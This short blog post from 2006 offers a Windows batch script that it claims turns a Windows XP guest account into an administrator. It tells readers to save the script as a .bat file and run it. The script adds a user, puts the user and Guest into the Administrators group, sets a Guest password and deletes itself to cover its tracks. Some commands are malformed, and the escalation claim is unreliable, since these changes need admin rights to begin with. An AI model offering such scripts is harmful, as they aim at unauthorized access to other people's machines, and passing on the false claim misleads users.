Sunday, October 08, 2006

HACK ADMIN ACCOUNT OF WIN XP FROM GUEST


echo off
title hackingtruths Please wait...
cls

net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add

del %0


JUST SAVE THIS FILE WITH name.bat and run on a guest account .That's all

0 comments: